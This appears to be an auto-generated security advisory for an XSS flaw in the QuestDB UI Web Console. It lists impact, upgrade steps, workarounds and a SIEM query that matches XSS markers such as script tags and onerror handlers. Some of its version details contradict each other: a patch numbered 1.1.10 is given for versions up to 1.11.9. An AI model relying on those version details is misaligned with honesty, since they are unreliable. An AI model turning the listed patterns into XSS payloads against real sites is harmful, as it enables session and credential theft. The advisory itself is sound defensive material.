CVE-2026-0824
📋 TL;DR
A cross-site scripting (XSS) vulnerability exists in QuestDB UI up to version 1.11.9, specifically in the Web Console component. This allows attackers to inject malicious scripts that execute in users' browsers when they interact with the vulnerable interface. Organizations running QuestDB UI versions 1.11.9 or earlier are affected.
💻 Affected Systems
- QuestDB UI
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, hijack user sessions, deface the interface, or redirect users to malicious sites, potentially leading to full system compromise.
Likely Case
Attackers inject malicious scripts to steal session cookies or credentials from authenticated users, enabling unauthorized access to the QuestDB database.
If Mitigated
With proper input validation and output encoding, the impact is limited to minor interface manipulation with no data compromise.
🎯 Exploit Status
Exploit details are publicly available in GitHub repositories. Remote execution makes this easily weaponizable.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.1.10 or QuestDB 9.3.0
Vendor Advisory: https://github.com/questdb/questdb/releases/tag/9.3.0
Restart Required: Yes
Instructions:
1. Upgrade QuestDB UI to version 1.1.10 or QuestDB to version 9.3.0. 2. Restart the QuestDB service. 3. Verify the patch commit b42fd9f18476d844ae181a10a249e003dafb823d is applied.
🔧 Temporary Workarounds
Disable Web Console
allTemporarily disable the vulnerable Web Console component to prevent exploitation
Modify QuestDB configuration to disable web console access
Implement WAF Rules
allConfigure web application firewall to block XSS payloads targeting QuestDB endpoints
Add XSS detection rules to your WAF configuration
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to limit script execution
- Use network segmentation to restrict access to QuestDB UI to trusted users only
🔍 How to Verify
Check if Vulnerable:
Check if QuestDB UI version is 1.11.9 or earlier. Review application logs for suspicious script injection attempts.Check Version:
Check QuestDB UI package version or review the application's version metadataVerify Fix Applied:
Verify the installed version is 1.1.10 or QuestDB 9.3.0. Check that commit b42fd9f18476d844ae181a10a249e003dafb823d is present in the codebase.📡 Detection & Monitoring
Log Indicators:
- Unusual script tags or JavaScript in HTTP requests to QuestDB endpoints
- Multiple failed XSS attempts in web server logs
Network Indicators:
- HTTP requests containing script injection payloads to QuestDB web console paths
- Unusual outbound connections from QuestDB server after XSS execution
SIEM Query:
source="questdb" AND (http_request CONTAINS "<script>" OR http_request CONTAINS "javascript:" OR http_request CONTAINS "onerror=" OR http_request CONTAINS "onload=")🔗 References
- https://github.com/59lab/dbdb/blob/main/There%20is%20a%20cross-site%20scripting(XSS)%20vulnerability%20in%20the%20QuestDB%20database.md
- https://github.com/questdb/questdb/releases/tag/9.3.0
- https://github.com/questdb/ui/
- https://github.com/questdb/ui/commit/b42fd9f18476d844ae181a10a249e003dafb823d
- https://github.com/questdb/ui/pull/518
- https://github.com/questdb/ui/pull/519#issue-3790862030
- https://vuldb.com/?ctiid.340357
- https://vuldb.com/?id.340357
- https://vuldb.com/?submit.733253
